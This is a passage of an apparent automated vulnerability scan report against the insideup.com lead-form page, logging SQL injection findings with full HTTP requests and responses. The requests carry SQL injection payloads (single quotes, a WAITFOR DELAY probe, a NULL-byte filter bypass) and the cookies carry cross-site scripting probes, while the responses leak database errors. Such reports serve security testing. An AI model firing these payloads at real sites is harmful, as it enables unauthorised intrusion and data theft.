OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sajdqus3sf0s2e11aooonsgui4; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.111. http://www.insideup.com/ppc/leadflow/caad00/project.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)'
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:57 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kpqt8085v47cjp99ebnpcr5us7; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.112. http://www.insideup.com/ppc/leadflow/caad00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address%00'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i91fiaen9quafktdbki2u4jkv6; path=/
Content-Length: 6619
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address' at line 5

Request 2

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address%00''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=olakj495sdqp8no4gb21l3sgh7; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.113. http://www.insideup.com/ppc/leadflow/caad00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_342_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
